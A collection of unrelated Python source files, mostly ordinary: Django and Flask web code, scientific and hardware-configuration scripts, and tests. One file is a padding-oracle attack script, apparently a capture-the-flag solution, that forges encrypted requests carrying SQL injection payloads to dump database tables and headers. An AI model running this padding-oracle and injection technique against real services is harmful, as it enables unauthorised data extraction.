y=x.decode(encoding='UTF-8',errors='strict')
if y==('xxx--StromPiPowerBack--xxx\n'):
print ("PowerBack - Email Sent")
Sendmail_Powerback()
def Power_Lost(a):
print ("Raspberry Pi Powerfail detected")
print ("Powerfail_Email sent")
Sendmail_Powerfail()
def Detect_Powerfail():
while 1:
x=serial_port.readline()
y = x.decode(encoding='UTF-8',errors='strict')
if y==('xxxShutdownRaspberryPixxx\n') or y==('xxx--StromPiPowerfail--xxx\n'):
print ("PowerFail - Email Sent")
Sendmail_Powerfail()
time.sleep(3)
if Restart_Mail == 1:
Sendmail_Restart()
try:
Detect_Powerfail()
while True:
time.sleep(0.1)
except KeyboardInterrupt:
print ("\nKeyboard Interrupt")
finally:
GPIO.cleanup()
print ("Cleaned up Pins") | StarcoderdataPython |
328326 | import pandas as pd
from chispa import assert_df_equality
from cishouseholds.derive import assign_filename_column
from cishouseholds.pipeline.ETL_scripts import extract_input_data
def test_assign_filename_column(pandas_df_to_temporary_csv, spark_session):
pandas_df = pd.DataFrame(
data={
"id": [0, 1],
"dummy": ["first_value", "second_value"],
}
)
csv_file_path = pandas_df_to_temporary_csv(pandas_df, sep="|")
path = "file:///" + str(csv_file_path.as_posix()).lstrip("/")
expected_df = spark_session.createDataFrame(
data=[
(0, "first_value", path),
(1, "second_value", path),
],
schema="id string, dummy string, csv_filename string",
)
input_df = extract_input_data(csv_file_path.as_posix(), None, sep="|")
output_df = assign_filename_column(input_df, "csv_filename")
assert_df_equality(expected_df, output_df, ignore_nullable=True)
| StarcoderdataPython |
1979564 | <gh_stars>0
termn = input("Number of Terms: ")
termn = int(termn)
terms = []
final =0
for i in range (0, termn):
cu = input("Term " +str(i + 1)+ ": ")
cu = int(cu)
terms.append(cu)
for item in terms:
final += item
print(final) | StarcoderdataPython |
9797954 | <gh_stars>100-1000
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_noop
from django.views.generic import View
from djng.views.mixins import (
JSONResponseException,
JSONResponseMixin,
allow_remote_invocation,
)
from memoized import memoized
from corehq.apps.domain.decorators import login_required, require_superuser
from corehq.apps.hqwebapp.views import BasePageView
from corehq.apps.notifications.forms import NotificationCreationForm
from corehq.apps.notifications.models import (
DismissedUINotify,
IllegalModelStateException,
LastSeenNotification,
Notification,
)
class NotificationsServiceRMIView(JSONResponseMixin, View):
urlname = "notifications_service"
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(NotificationsServiceRMIView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponse("foo")
@allow_remote_invocation
def get_notifications(self, in_data):
# todo always grab alerts if they are still relevant
notifications = Notification.get_by_user(self.request.user, self.request.couch_user)
has_unread = len([x for x in notifications if not x['isRead']]) > 0
last_seen_notification_date = LastSeenNotification.get_last_seen_notification_date_for_user(
self.request.user
)
return {
'hasUnread': has_unread,
'notifications': notifications,
'lastSeenNotificationDate': last_seen_notification_date
}
@allow_remote_invocation
def mark_as_read(self, in_data):
Notification.objects.get(pk=in_data['id']).mark_as_read(self.request.user)
return {}
@allow_remote_invocation
def save_last_seen(self, in_data):
if 'notification_id' not in in_data:
raise JSONResponseException('notification_id is required')
notification = get_object_or_404(Notification, pk=in_data['notification_id'])
try:
notification.set_as_last_seen(self.request.user)
except IllegalModelStateException as e:
raise JSONResponseException(str(e))
return {
'activated': notification.activated
}
@allow_remote_invocation
def dismiss_ui_notify(self, in_data):
if 'slug' not in in_data:
raise JSONResponseException('slug for ui notify is required')
DismissedUINotify.dismiss_notification(self.request.user, in_data['slug'])
return {
'dismissed': DismissedUINotify.is_notification_dismissed(self.request.user, in_data['slug'])
}
class ManageNotificationView(BasePageView):
urlname = 'manage_notifications'
page_title = ugettext_noop("Manage Notification")
template_name = 'notifications/manage_notifications.html'
@method_decorator(require_superuser)
def dispatch(self, request, *args, **kwargs):
return super(ManageNotificationView, self).dispatch(request, *args, **kwargs)
@property
@memoized
def create_form(self):
if self.request.method == 'POST' and 'submit' in self.request.POST:
return NotificationCreationForm(self.request.POST)
return NotificationCreationForm()
@property
def page_context(self):
return {
'alerts': [{
'content': alert.content,
'url': alert.url,
'type': alert.get_type_display(),
'activated': str(alert.activated),
'isActive': alert.is_active,
'id': alert.id,
} for alert in Notification.objects.order_by('-created').all()],
'form': self.create_form,
}
@property
def page_url(self):
return reverse(self.urlname)
def post(self, request, *args, **kwargs):
if 'submit' in request.POST and self.create_form.is_valid():
self.create_form.save()
elif 'activate' in request.POST:
note = Notification.objects.filter(pk=request.POST.get('alert_id')).first()
note.activate()
elif 'deactivate' in request.POST:
note = Notification.objects.filter(pk=request.POST.get('alert_id')).first()
note.deactivate()
elif 'remove' in request.POST:
Notification.objects.filter(pk=request.POST.get('alert_id')).delete()
return self.get(request, *args, **kwargs)
| StarcoderdataPython |
4870223 | import base64
import logging
from Crypto.Util.Padding import pad
from padding_oracle import AESPaddingOracle, Base64OracleClient
logger = logging.getLogger('padding-oracle')
logger.setLevel('INFO')
if __name__ == "__main__":
bas64_ciphertext = "<KEY>~~"
bas64_ciphertext = bas64_ciphertext.replace('~', '=').replace('!', '/').replace('-', '+')
ciphertext = base64.b64decode(bas64_ciphertext)
key = bytes.fromhex('00000000000000000000000000000000')
key = base64.b64encode(key).decode('utf8')
key = key.replace('=', '~').replace('/', '!').replace('+', '-')
oracle_client = Base64OracleClient("http://localhost:5000/decrypt?post=")
padding_oracle = AESPaddingOracle(oracle_client)
# sql_statement = "UNION SELECT GROUP_CONCAT(body SEPARATOR ', ') as title, body FROM posts"
# sql_statement = "UNION SELECT GROUP_CONCAT(title SEPARATOR ', ') as title, body FROM posts"
# sql_statement = "UNION SELECT GROUP_CONCAT(id SEPARATOR ', ') as title, body FROM posts"
# sql_statement = "UNION SELECT GROUP_CONCAT(COLUMN_NAME) AS title, EXTRA AS body FROM information_schema.columns WHERE TABLE_NAME = 'posts'"
# sql_statement = "UNION SELECT GROUP_CONCAT(TABLE_NAME) AS title, ENGINE as body FROM information_schema.tables WHERE table_schema=DATABASE()"
# sql_statement = "UNION SELECT GROUP_CONCAT(COLUMN_NAME) AS title,EXTRA AS body FROM information_schema.columns WHERE TABLE_NAME='tracking'"
# sql_statement = "UNION SELECT GROUP_CONCAT(TABLE_NAME) AS title, ENGINE as body FROM information_schema.tables WHERE table_schema=DATABASE()"
sql_statement = "UNION SELECT GROUP_CONCAT(headers SEPARATOR ',') as title,id as body FROM tracking"
sql_statement_length = len(sql_statement)
flag = "^FLAG^0000000000000000000000000000000000000000000000000000000000000000$FLAG$" + key
flag = flag[:-sql_statement_length]
plaintext = f'{{"flag" : "{flag}", "id" : "0 {sql_statement}", "key" : ""}}'.encode('utf8')
plaintext = pad(plaintext, 16)
ciphertext = padding_oracle.encrypt(plaintext, ciphertext)
ciphertext = base64.b64encode(ciphertext).decode('utf8')
ciphertext = ciphertext.replace('=', '~').replace('/', '!').replace('+', '-')
print(f"Base 64 encoded and modified ciphertext: {ciphertext}") | StarcoderdataPython |
1682464 | #!/usr/bin/env python
#purpose: extract reciprocal best BLAST matches for a pair of datasets
#usage: ./reciprocal_blast_hits.py a_vs_b b_vs_a col_query col_match col_score sort_order out_file
#example, requires both blast hits attained highest bit score (12th column in blast's '-outfmt 6'):
# ./reciprocal_blast_hits.py a_vs_b.blastout b_vs_a.blastout 1 2 12 high a_b.hits.out
#example, requires both blast hits attained lowest evalue (11th column in -outfmt 6):
# ./reciprocal_blast_hits.py a_vs_b.blastout b_vs_a.blastout 1 2 11 low a_b.hits.out
import sys
def stop_err( msg ):
sys.stderr.write("%s\n" % msg)
sys.exit(1)
def get_col_index(col_str):
if col_str[0]=="c":
col_str = col_str[1:]
return int(col_str)-1
def main():
#Parse Command Line
try:
a_vs_b, b_vs_a, c_query, c_match, c_score, sort_order, out_file = sys.argv[1:]
except:
stop_err("Expect 7 arguments: two input files, column settings, output file")
want_highest = want_lowest = False
if sort_order == "high":
want_highest = True
elif sort_order == "low":
want_lowest = True
else:
stop_err("Sort order argument should be high or low")
if out_file in [a_vs_b, b_vs_a]:
stop_err("Output file would overwrite an input file")
c_query = get_col_index(c_query)
c_match = get_col_index(c_match)
c_score = get_col_index(c_score)
if len(set([c_query, c_match, c_score])) < 3:
stop_err("Need three different column numbers!")
best_a_vs_b = dict()
for line in open(a_vs_b):
if line.startswith("#"): continue
parts = line.rstrip("\n").split("\t")
a = parts[c_query]
b = parts[c_match]
score = float(parts[c_score])
if (a not in best_a_vs_b) \
or (want_highest and score > best_a_vs_b[a][1]) \
or (want_lowest and score < best_a_vs_b[a][1]):
best_a_vs_b[a] = (b, score, parts[c_score])
b_short_list = set(b for (b,score, score_str) in best_a_vs_b.values())
best_b_vs_a = dict()
for line in open(b_vs_a):
if line.startswith("#"): continue
parts = line.rstrip("\n").split("\t")
b = parts[c_query]
a = parts[c_match]
#if a not in best_a_vs_b:
# continue
#stop_err("The A-vs-B file does not have A-ID %r found in B-vs-A file" % a)
if b not in b_short_list: continue
score = float(parts[c_score])
if (b not in best_b_vs_a) \
or (want_highest and score > best_b_vs_a[b][1]) \
or (want_lowest and score < best_b_vs_a[b][1]):
best_b_vs_a[b] = (a, score, parts[c_score])
#TODO - Preserve order from A vs B?
a_short_list = sorted(set(a for (a,score,score_str) in best_b_vs_a.values()))
count = 0
outfile = open(out_file, 'w')
outfile.write("#A_id\tB_id\tA_vs_B\tB_vs_A\n")
for a in a_short_list:
if a not in best_a_vs_b:
continue
b = best_a_vs_b[a][0]
if b in best_b_vs_a and a == best_b_vs_a[b][0]:
outfile.write("%s\t%s\t%s\t%s\n" % (a, b, best_a_vs_b[a][2], best_b_vs_a[b][2]))
count += 1
outfile.close()
#print "Done, %i RBH found" % count
print "Done with script"
if __name__ == '__main__':
main() | StarcoderdataPython |
3438773 | <gh_stars>0
"""*****************************************************************************
* Copyright (C) 2018-2019 Microchip Technology Inc. and its subsidiaries.
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to comply with third party license terms applicable to your
* use of third party software (including open source software) that may
* accompany Microchip software.
*
* THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
* PARTICULAR PURPOSE.
*
* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
*****************************************************************************"""
################################################################################
#### Register Information ####
################################################################################
rngValGrp_RNGCON_TRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__TRNGEN"]')
rngValGrp_RNGCON_PRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__PRNGEN"]')
rngValGrp_RNGCON_CONT = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__CONT"]')
rngValGrp_RNGCON_TRNGMODE = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__TRNGMODE"]')
rngBitFld_RNGCON_PLEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="PLEN"]')
rngBitFld_RNGCON_TRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="TRNGEN"]')
rngBitFld_RNGCON_PRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="PRNGEN"]')
rngBitFld_RNGCON_CONT = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="CONT"]')
rngBitFld_RNGCON_TRNGMODE = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="TRNGMODE"]')
################################################################################
#### Global Variables ####
################################################################################
global rngInstanceName
global rngSym_RNGCON_PLEN
global rngSym_RNGCON_TRNGEN
global rngSym_RNGCON_PRNGEN
global rngSym_RNGCON_CONT
global rngSym_RNGCON_TRNGMODE
################################################################################
#### Business Logic ####
################################################################################
def _get_bitfield_names(node, outputList):
valueNodes = node.getChildren()
for ii in reversed(valueNodes):
dict = {}
if(ii.getAttribute('caption').lower() != "reserved"):
dict['desc'] = ii.getAttribute('caption')
dict['key'] = ii.getAttribute('caption')
value = ii.getAttribute('value')
if(value[:2]=='0x'):
temp = value[2:]
tempint = int(temp,16)
else:
tempint = int(value)
dict['value'] = str(tempint)
outputList.append(dict)
def combineValues(symbol, event):
plenValue = rngSym_RNGCON_PLEN.getValue() << 0
trngenValue = rngSym_RNGCON_TRNGEN.getValue() << 8
prngenValue = rngSym_RNGCON_PRNGEN.getValue() << 9
contValue = rngSym_RNGCON_CONT.getValue() << 10
trngValue = rngSym_RNGCON_TRNGMODE.getValue() << 11
rngconValue = plenValue + trngenValue + prngenValue + contValue + trngValue
symbol.setValue(rngconValue, 2)
def updateRNGClockWarningStatus(symbol, event):
symbol.setVisible(not event["value"])
################################################################################
#### Component ####
################################################################################
def instantiateComponent(rngComponent):
global rngInstanceName
global rngSym_RNGCON_PLEN
global rngSym_RNGCON_TRNGEN
global rngSym_RNGCON_PRNGEN
global rngSym_RNGCON_CONT
global rngSym_RNGCON_TRNGMODE
rngInstanceName = rngComponent.createStringSymbol("RNG_INSTANCE_NAME", None)
rngInstanceName.setVisible(False)
rngInstanceName.setDefaultValue(rngComponent.getID().upper())
print("Running " + rngInstanceName.getValue())
#Clock enable
Database.setSymbolValue("core", rngInstanceName.getValue() + "_CLOCK_ENABLE", True, 1)
rngSym_RNGCON_PLEN = rngComponent.createIntegerSymbol("RNGCON_PLEN", None)
rngSym_RNGCON_PLEN.setLabel(rngBitFld_RNGCON_PLEN.getAttribute("caption"))
rngSym_RNGCON_PLEN.setDefaultValue(0)
rngSym_RNGCON_PLEN.setMin(0)
rngSym_RNGCON_PLEN.setMax(64)
rngSym_RNGCON_PLEN.setVisible(True)
rngTRNGEN_names = []
_get_bitfield_names(rngValGrp_RNGCON_TRNGEN, rngTRNGEN_names)
rngSym_RNGCON_TRNGEN = rngComponent.createKeyValueSetSymbol("RNGCON_TRNGEN", None)
rngSym_RNGCON_TRNGEN.setLabel(rngBitFld_RNGCON_TRNGEN.getAttribute("caption"))
rngSym_RNGCON_TRNGEN.setDefaultValue(0)
rngSym_RNGCON_TRNGEN.setOutputMode("Value")
rngSym_RNGCON_TRNGEN.setDisplayMode("Description")
for ii in rngTRNGEN_names:
rngSym_RNGCON_TRNGEN.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_TRNGEN.setVisible(True)
rngPRNGEN_names = []
_get_bitfield_names(rngValGrp_RNGCON_PRNGEN, rngPRNGEN_names)
rngSym_RNGCON_PRNGEN = rngComponent.createKeyValueSetSymbol("RNGCON_PRNGEN", None)
rngSym_RNGCON_PRNGEN.setLabel(rngBitFld_RNGCON_PRNGEN.getAttribute("caption"))
rngSym_RNGCON_PRNGEN.setDefaultValue(0)
rngSym_RNGCON_PRNGEN.setOutputMode("Value")
rngSym_RNGCON_PRNGEN.setDisplayMode("Description")
for ii in rngPRNGEN_names:
rngSym_RNGCON_PRNGEN.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_PRNGEN.setVisible(True)
rngCONT_names = []
_get_bitfield_names(rngValGrp_RNGCON_CONT, rngCONT_names)
rngSym_RNGCON_CONT = rngComponent.createKeyValueSetSymbol("RNGCON_CONT", None)
rngSym_RNGCON_CONT.setLabel(rngBitFld_RNGCON_CONT.getAttribute("caption"))
rngSym_RNGCON_CONT.setDefaultValue(0)
rngSym_RNGCON_CONT.setOutputMode("Value")
rngSym_RNGCON_CONT.setDisplayMode("Description")
for ii in rngCONT_names:
rngSym_RNGCON_CONT.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_CONT.setVisible(True)
rngTRNGMODE_names = []
_get_bitfield_names(rngValGrp_RNGCON_TRNGMODE, rngTRNGMODE_names)
rngSym_RNGCON_TRNGMODE = rngComponent.createKeyValueSetSymbol("RNGCON_TRNGMODE", None)
rngSym_RNGCON_TRNGMODE.setLabel(rngBitFld_RNGCON_TRNGMODE.getAttribute("caption"))
rngSym_RNGCON_TRNGMODE.setDefaultValue(0)
rngSym_RNGCON_TRNGMODE.setOutputMode("Value")
rngSym_RNGCON_TRNGMODE.setDisplayMode("Description")
for ii in rngTRNGMODE_names:
rngSym_RNGCON_TRNGMODE.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_TRNGMODE.setVisible(True)
#Collect user input to combine into RNGCON register
rngSym_RNGCON = rngComponent.createHexSymbol("RNGCON_VALUE", None)
rngSym_RNGCON.setDefaultValue(0)
rngSym_RNGCON.setVisible(False)
rngSym_RNGCON.setDependencies(combineValues, ["RNGCON_PLEN"])
rngSym_RNGCON.setDependencies(combineValues, ["RNGCON_TRNGEN"])
rngSym_RNGCON.setDependencies(combineValues, ["RNGCON_PRNGEN"])
rngSym_RNGCON.setDependencies(combineValues, ["RNGCON_CONT"])
rngSym_RNGCON.setDependencies(combineValues, ["RNGCON_TRNGMODE"])
# Clock Warning status
rngSym_ClkEnComment = rngComponent.createCommentSymbol("RNG_CLOCK_ENABLE_COMMENT", None)
rngSym_ClkEnComment.setLabel("Warning!!! " + rngInstanceName.getValue() + " Peripheral Clock is Disabled in Clock Manager")
rngSym_ClkEnComment.setVisible(False)
rngSym_ClkEnComment.setDependencies(updateRNGClockWarningStatus, ["core." + rngInstanceName.getValue() + "_CLOCK_ENABLE"])
############################################################################
#### Dependency ####
############################################################################
############################################################################
#### Code Generation ####
############################################################################
configName = Variables.get("__CONFIGURATION_NAME")
rngHeader1File = rngComponent.createFileSymbol("RNG_HEADER1", None)
rngHeader1File.setMarkup(True)
rngHeader1File.setSourcePath("../peripheral/rng_00159/templates/plib_rng.h.ftl")
rngHeader1File.setOutputName("plib_rng.h")
rngHeader1File.setDestPath("peripheral/rng/")
rngHeader1File.setProjectPath("config/" + configName + "/peripheral/rng/")
rngHeader1File.setType("HEADER")
rngHeader1File.setOverwrite(True)
rngSource1File = rngComponent.createFileSymbol("RNG_SOURCE1", None)
rngSource1File.setMarkup(True)
rngSource1File.setSourcePath("../peripheral/rng_00159/templates/plib_rng.c.ftl")
rngSource1File.setOutputName("plib_rng.c")
rngSource1File.setDestPath("peripheral/rng/")
rngSource1File.setProjectPath("config/" + configName + "/peripheral/rng/")
rngSource1File.setType("SOURCE")
rngSource1File.setOverwrite(True)
rngSystemInitFile = rngComponent.createFileSymbol("RNG_INIT", None)
rngSystemInitFile.setType("STRING")
rngSystemInitFile.setOutputName("core.LIST_SYSTEM_INIT_C_SYS_INITIALIZE_PERIPHERALS")
rngSystemInitFile.setSourcePath("../peripheral/rng_00159/templates/system/initialization.c.ftl")
rngSystemInitFile.setMarkup(True)
rngSystemDefFile = rngComponent.createFileSymbol("RNG_DEF", None)
rngSystemDefFile.setType("STRING")
rngSystemDefFile.setOutputName("core.LIST_SYSTEM_DEFINITIONS_H_INCLUDES")
rngSystemDefFile.setSourcePath("../peripheral/rng_00159/templates/system/definitions.h.ftl")
rngSystemDefFile.setMarkup(True)
| StarcoderdataPython |
3406898 | #!/usr/bin/env python
from __future__ import absolute_import, print_function
import sys
import re
import six
from subprocess import check_output
def to_string(ver):
if not ver:
return ""
return ".".join([six.text_type(c) for c in ver])
def exit_if_not_within(ver, min_ver, max_ver=None):
if ver < min_ver or (max_ver and ver > max_ver):
versions = [to_string(v) for v in [ver, min_ver, max_ver]]
print("Version {} doesn't fall into the range [{},{}]".format(*versions), # noqa
file=sys.stderr)
sys.exit(1)
def docker():
"""
Checks if docker is of the expected version
"""
pattern = r"Docker version (\d+)\.(\d+)\.(\d+)"
version_string = check_output(["docker", "--version"])
m = re.match(pattern, version_string)
version = tuple(int(i) for i in m.groups())
exit_if_not_within(version, (19, 3))
checks = [
docker
]
def main():
try:
pattern = sys.argv[1]
except IndexError:
print("Usage: version-check.py <regex>") # noqa
for check in checks:
if re.match(pattern, check.__name__):
print("Checking version of {}".format(check.__name__)) # noqa
check()
if __name__ == '__main__':
main()
| StarcoderdataPython |
1898549 | <filename>profile/blog.py
import flask
import werkzeug.exceptions
import profile.admin
import profile.db
bp = flask.Blueprint('blog', __name__, url_prefix='/blog')
@bp.route('/')
def index():
"""Display posts"""
db = profile.db.get_db()
query = (
'SELECT p.id, title, body, created, author_id, username' +
' FROM post p JOIN user u ON p.author_id = u.id' +
' ORDER BY created DESC'
)
posts = db.execute(query).fetchall()
return flask.render_template('blog/index.html', posts=posts)
@bp.route('/create', methods=('GET', 'POST'))
@profile.admin.login_required
def create():
"""View to create a post."""
if flask.request.method == 'POST':
title = flask.request.form['title']
body = flask.request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
# Display error
flask.flash(error)
else:
# Post is valid -- add to database
db = profile.db.get_db()
query = 'Insert INTO post (title, body, author_id) VALUES (?, ?, ?)'
db.execute(query, (title, body, flask.g.user['id']))
db.commit()
return flask.redirect(flask.url_for('blog.index'))
return flask.render_template('blog/create.html')
def get_post(post_id, check_author=True):
"""Get post information from the database."""
query = (
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' WHERE p.id = ?'
)
post = profile.db.get_db().execute(query, (post_id,)).fetchone()
if post is None:
flask.abort(404, f'Post id {post_id} does not exist')
if check_author and post['author_id'] != flask.g.user['id']:
flask.abort(403)
return post
@bp.route('/<int:post_id>/update', methods=('GET', 'POST'))
@profile.admin.login_required
def update(post_id):
"""Update a post."""
post = get_post(post_id)
# Update post information if this is a post request
if flask.request.method == 'POST':
title = flask.request.form['title']
body = flask.request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
flask.flash(error)
else:
# Update post information in database
db = profile.db.get_db()
query = 'UPDATE post SET title = ?, body = ? WHERE id = ?'
db.execute(query, (title, body, post_id))
db.commit()
return flask.redirect(flask.url_for('blog.index'))
return flask.render_template('blog/update.html', post=post)
@bp.route('/<int:post_id>/delete', methods=('POST',))
@profile.admin.login_required
def delete(post_id):
"""Delete a post."""
get_post(post_id)
db = profile.db.get_db()
query = 'DELETE from post WHERE id = ?'
db.execute(query, (post_id, ))
db.commit()
return flask.redirect(flask.url_for('blog.index'))
| StarcoderdataPython |
3255732 | <reponame>toonsegers/sec_groups
"""Secure norm protocols by <NAME>, adapted by <NAME>.
See: https://www.researchgate.net/profile/Thijs_Veugen
"""
import itertools
from mpyc.runtime import mpc
def norm(self, x):
"""Recursive norm (adapted from mpc._norm())."""
def _norm(x):
n = len(x)
if n == 1:
t = x[0]
return 1 - t, t
i0, nz0 = _norm(x[:n//2]) # low bits
i1, nz1 = _norm(x[n//2:]) # high bits
i0 += (((n+1)//2))
return self.if_else(nz1, [i1, nz1], [i0, nz0])
l = type(x[0]).bit_length
i, _ = _norm(x)
return l - i
def bit_length_mpc_norm(self, a):
"""Bit length currently in MPyC."""
x = self.to_bits(a) # low to high bits
return norm(self, x)
def bit_length_mpc_find(self, a):
"""Bit length currently in MPyC."""
l = type(a).bit_length
x = self.to_bits(a) # low to high bits
x.reverse()
nf = self.find(x, 1)
return l - nf
@mpc.coroutine
async def bit_length_new(self, a):
stype = type(a)
await self.returnType(stype)
Zp = stype.field
l = stype.bit_length
r_bits = await self.random_bits(Zp, l)
r_modl = 0
for r_i in reversed(r_bits):
r_modl <<= 1
r_modl += r_i.value
r_divl = self._random(Zp, 1<<self.options.sec_param).value
a = await self.gather(a)
c = await self.output(a + ((1<<l) + (r_divl << l) + r_modl))
c = c.value % (1<<l)
c_bits = [(c >> i) & 1 for i in range(l)]
r_bits = [stype(r.value) for r in r_bits]
d_bits = [1-r_bits[i] if c_bits[i] else r_bits[i] for i in range(l)]
h_bits = mpc.schur_prod([1-r_bits[i] for i in range(l-1) if not c_bits[i]],
[d_bits[i+1] for i in range(l-1) if not c_bits[i]])
for i in range(l-2, -1, -1):
if not c_bits[i]:
d_bits[i+1] = h_bits.pop()
k = norm(self, d_bits) - 1
k_u = self.unit_vector(k, l) # 0<=k<l assumed
k = mpc.in_prod(k_u, list(map(stype, range(l+1))))
k2 = mpc.in_prod(k_u, list(map(stype, list(map(lambda a: 2**a, range(l+1))))))
return k - (a < k2) + 1 # position + 1 is bit length
@mpc.coroutine
async def bit_length_integrated(self, a):
stype = type(a)
await self.returnType(stype)
Zp = stype.field
l = stype.bit_length
r_bits = await self.random_bits(Zp, l)
r_modl = 0
for r_i in reversed(r_bits):
r_modl <<= 1
r_modl += r_i.value
r_divl = self._random(Zp, 1<<self.options.sec_param).value
a = await self.gather(a)
c = await self.output(a + ((1<<l) + (r_divl << l) + r_modl))
c = c.value % (1<<l)
c_bits = [(c >> i) & 1 for i in range(l)]
d_bits = [stype((1 - r_bits[i] if c_bits[i] else r_bits[i]).value) for i in range(l)]
h_bits = mpc.schur_prod([stype(1 - r_bits[i]) for i in range(l-1) if not c_bits[i]],
[d_bits[i+1] for i in range(l-1) if not c_bits[i]])
for i in range(l-2, -1, -1):
if not c_bits[i]:
d_bits[i+1] = h_bits.pop()
k = norm(self, d_bits) - 1
k_u = self.unit_vector(k, l) # 0<=k<l assumed
k_u = await mpc.gather(k_u)
psums = list(itertools.accumulate(k_u))
pp = await mpc.schur_prod(psums, [c_bits[i] - r_bits[i] for i in range(l)])
for i in range(l):
r_bits[i] += pp[i]
s_sign = (await self.random_bits(Zp, 1, signed=True))[0].value
e = [None] * (l+1)
sumXors = 0
for i in range(l-1, -1, -1):
c_i = c_bits[i]
r_i = r_bits[i].value
e[i] = Zp(s_sign + r_i - c_i + 3*sumXors)
sumXors += 1 - r_i if c_i else r_i
e[l] = Zp(s_sign - 1 + 3*sumXors)
g = await self.is_zero_public(stype(self.prod(e)))
z = Zp(1 - s_sign if g else 1 + s_sign)/2
return k - z + 1 # position + 1 is bit length
async def test(text, bit_length):
print(f'Secure bit length: using {text}.')
async with mpc:
for i in range(1, 128): # TODO: case i=0, case i<0
a = i
n = await mpc.output(bit_length(mpc, secint(a)))
print(f'{round(100*i/127)}%', end='\r')
assert a.bit_length() == n, (a.bit_length(), n, i)
# secint = mpc.SecInt()
# print(f'Using secure {secint.bit_length}-bit integers: {secint.__name__}')
# mpc.run(test('MPyC bit decomposition (norm)', bit_length_mpc_norm))
# mpc.run(test('MPyC bit decomposition (find)', bit_length_mpc_find))
# mpc.run(test('new O(m) approach', bit_length_new))
# mpc.run(test('integrated O(m) approach', bit_length_integrated))
| StarcoderdataPython |
6505394 | # -*- coding: utf-8 -*-
from django.db import models
from config.common import Common
from django.utils.translation import ugettext_lazy as _
from agent.models import Agent
from django_fsm import FSMKeyField, transition
import datetime
from django.db.models.signals import post_save
from django.utils.formats import date_format
from django.core.validators import RegexValidator
class Company(models.Model):
user = models.ForeignKey(Common.AUTH_USER_MODEL, related_name='company')
name = models.CharField(_(u'Nom'), max_length=256, null=True)
phonenumber = models.CharField(
_(u'Téléphone fixe'), max_length=10, null=True)
faxnumber = models.CharField(
_(u'Numéro de fax'), max_length=10, blank=True, null=True)
ape = models.CharField(_(u'Code APE'), max_length=256, blank=True, null=True)
siret = models.CharField(_(u'Code SIRET'), max_length=256, blank=True, null=True)
vat_number = models.CharField(_('Numero de TVA'), validators=[RegexValidator(regex='^.{11}$', message='Exactement 11 caracteres', code='nomatch')], max_length=11, blank=True, null=True)
address1 = models.CharField(_('Adresse 1'), max_length=120)
address2 = models.CharField(_('Adresse 2'), max_length=120, blank=True, null=True)
zipcode = models.CharField(_('Code Postal'), max_length=5, blank=True)
city = models.CharField(_('Ville'), max_length=120, blank=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.name
class States(models.Model):
id = models.CharField(primary_key=True, max_length=50)
label = models.CharField(max_length=255)
def __unicode__(self):
return self.label
from django.middleware import csrf
def get_or_create_csrf_token(request):
token = request.META.get('CSRF_COOKIE', None)
if token is None:
token = csrf._get_new_csrf_key()
request.META['CSRF_COOKIE'] = token
request.META['CSRF_COOKIE_USED'] = True
return token
class SelectionQuerySet(models.QuerySet):
def for_user(self, user):
print "UUSSEERR :", user
return self.filter(client=user)
class Selection(models.Model):
owner = models.ForeignKey(Common.AUTH_USER_MODEL, related_name='selection')
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
state = FSMKeyField(States, default='new', protected=True, blank=True, null=True, related_name='selection_state')
name = models.CharField(_('Nom'), max_length=120, blank=True, null=True)
description = models.CharField(_('Description'), max_length=220, blank=True, null=True)
agents = models.ManyToManyField(Agent, blank=True,
null=True,
through='SelectionAgentsRelationship',
related_name='agents')
